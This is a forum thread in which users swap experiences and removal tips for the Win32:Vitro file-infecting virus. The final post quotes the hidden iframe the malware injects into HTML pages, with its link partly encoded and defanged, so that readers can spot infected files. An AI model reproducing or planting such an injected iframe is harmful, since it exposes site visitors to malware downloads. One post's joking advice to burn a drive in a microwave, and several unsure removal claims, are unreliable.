Malware name Win32:Vitro

[!Donovan]

This virus is horible from what I understand and needs to get a REMOVAL TOOL so if it does try to infect a PC, the REMOVAL TOOL can stop it.

[Confused Computer User]

Not much sense in doing that. This thing (because it's soo much more than a virus now) infects executable files.

A REMOVAL TOOL  wouldn't stand a chance. At least I think so. The only options are prevention (first and foremost) and format. 

[cballar2]

Hey all-

I recently contracted this virus on my home desktop computer, and was wondering if other hardware such as iPods that are connected to the computer by USB are able to contract and share the virus to other computers.  Just a precaution before i try to plug my iPod back into my laptop.  Thanks.

[!Donovan]

Not much sense in doing that. This thing (because it's soo much more than a virus now) infects executable files.

A REMOVAL TOOL  wouldn't stand a chance. At least I think so. The only options are prevention (first and foremost) and format. 

Woulden't it be possible if the REMOVAL TOOL added its own extintion with a whole different coding like ".ffs" or ".wgr" so it wouldn't infect it?

[Confused Computer User]

 

Woulden't it be possible if the REMOVAL TOOL added its own extintion with a whole different coding like ".ffs" or ".wgr" so it wouldn't infect it?

Up until now I've never seen those types of files. I looked for a description and only found one for ".ffs" at:

http://en.wikipedia.org/wiki/Unix_File_System

The thing is that we can't safe these files in formats that windows doesn't recognize and then try to execute them. It would be like trying to run a ".exe" file on MAC OS X. It wont happen unless you use special applications. (see link)
http://www.pcuser.com.au/pcuser/hs2.nsf/lookup+1/83ADDE11BB01E5A1CA256C48000F4708

So even if the file is a non executable it would have to be opened by one that is so still not much choice since that would probably be opened.

I could be wrong... I'm not sure if the ".wgr" type of files run on windows.

[optikal_illuzion]

This Vitro virus makes me sooooooooooooooo glad I'm still running WindowsME on my computer.
My wife on the other hand..... Not so happy. Her system has been killed by this virus 5 times in the last week. And mine hasn't been effected or infected at all. She has Avast on her computer and the thing will detect the Win32 Vitro file on every system32 she has. Been through file recoveries, and formats and the pesky things still comes back.

[!Donovan]

Woulden't it be possible if the REMOVAL TOOL added its own extintion with a whole different coding like ".ffs" or ".wgr" so it wouldn't infect it?

Up until now I've never seen those types of files. I looked for a description and only found one for ".ffs" at:

http://en.wikipedia.org/wiki/Unix_File_System

The thing is that we can't safe these files in formats that windows doesn't recognize and then try to execute them. It would be like trying to run a ".exe" file on MAC OS X. It wont happen unless you use special applications. (see link)
http://www.pcuser.com.au/pcuser/hs2.nsf/lookup+1/83ADDE11BB01E5A1CA256C48000F4708

So even if the file is a non executable it would have to be opened by one that is so still not much choice since that would probably be opened.

I could be wrong... I'm not sure if the ".wgr" type of files run on windows.

Maybe the program could add the extintions so it works like with Microsoft Small Busness. O_o

[shaybear]

all of you are kidding right ?
fighting it ?
if you see vitro and you have external Hard Drive
Bash external Hard Drive with a hammer then burn it in microwave
insert your OS disk (make sure its read-only like CD-DVD)
format your hard drives
install OS
go buy a new external Hard Drive

LMFAO!!!!  OK, I had to quote this and thank you for posting it.  In a matter of 10 seconds i went from wanting to put my fist thru my Pc, to laughing and starting with a clear and focused mind... LOL Bash with a hammer then burn it in a microwave hahaha  ok, now back to going Xena on this damn viruses ass.... 

[shaybear]

ok in my system 32 folder ( I am running XP service pack 3 ) there is the winlogon.exe file, but also in my C:Windows/Temp folder there is an exe file named winlognn ( thats winlogNn - 2 "n" s) could that temp folder file be the issue??? it was created yesterday ( 4/9/2009) .   we reformatted this POS on 4/6/2009 and with it being in the TEMP folder, Im thinking thats the virus....  ( sorry I am not a very computer-savvy girl lol

[Confused Computer User]

Maybe the program could add the extintions so it works like with Microsoft Small Busness. O_o

I have no clue what that is. Sorry.

[MAXIUM]

Only 3 antivirus detect Vitro on my system...

- AVAST!
- GData
- McAfee

http://www.virscan.org/report/f40c8875f64c9bc2b76f6e82fd8438cc.html
http://www.virustotal.com/es/analisis/948936c8f36f3f29f8e64df8eced9e27

[ADAMSNAKE]

Hi guys i been reading this topic over the past few days looking for ways to remove this virus without formating but no luck. so insted i did format and i did get the virus again using old back ups lmao.

I removed my old backups but did manage to keep some ISO files which are same (no virus alert from avast).

With my old backups i had txt documents that had the virus in. .exe had them in.

A JPEG picture did not have it in.

I am wondering about MP3, when my pc got infected i had another HDD 400gig full of music and flims. i did turn off the pc and disconnect that drive when messing around. I managed to get rid of the virus i think. But i am unsure about my 400gig, i have run a few .avi and opened a few .txt files and no virus alert. before i go to be i will run a scan.

What file types are effected by this virus? and whar are not.

I read that only xp is effected by this virus? strange hey.

Last question i have a friend that has important movies and stuff on his pc, he has been affected with this virus but he has no way of backing up his stuff. is there any way on how to remove it without formating and losing everything?. If he does a virus scan and removes the virus it will eat away his system files so thats out of the question.

any help

Thank you so much.

Adam Evans.

BTW two virus programs that i know pick this up, AVG FREE and AVAST! HOME FREE.

cheers guys

[boybawang]

Last question i have a friend that has important movies and stuff on his pc, he has been affected with this virus but he has no way of backing up his stuff. is there any way on how to remove it without formating and losing everything?

1. Make a thorough bootscan with AVAST first before doing a backup. And allow it to delete all infected files. Don't worry your movies won't be deleted.

2. After it's done with the cleaning, your system will continue booting. DONT ALLOW IT TO CONTINUE BOOTING!! Turn-off your system immediately before it completes the boot-up process because Vitro still exists.

3.If you wanna backup in a clean environment without any worries about vitro infecting in the background, You download LINUX UBUNTU. Burn it, boot it, and do all the backup from there. It has a simple burning utility that should be enough for your purpose. But don't backup HTML/HTM files and EXE files especially exe files below 100KB in size because most Virus passes AVAST detection.  that's all.


Off topic: I just found the funniest Vitro removal guide in the following link!
skip immediately to the Vitro manual removal instruction part for the best humor
http://www.spywareremove.com/removeWin32Vitro.html

[DonNils]

how did you know that it your HTML files are not infected? by scanning with AVAST?
You should know that so far AVAST can't detect an infected HTML file!  You better try to open the file with notepad and you will see the malicious link in iFrame attached at the bottom.
The same applies to EXE files. Not all infected EXE files can be detected by avast so the size is our only hint.

yes lol i checked them all (and notepad ++ has a nice function to search in all files in a given directory for text... Strg+F)
nothing like iframe was detected.. neither i opened it with a webbrowser; just viewed it!

[boybawang]

Hi DonNils,

It's something that looks like this at the bottom of HTM page:
<iframe src="hxxp://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>

Misak changed http -> hxxp (live malware link)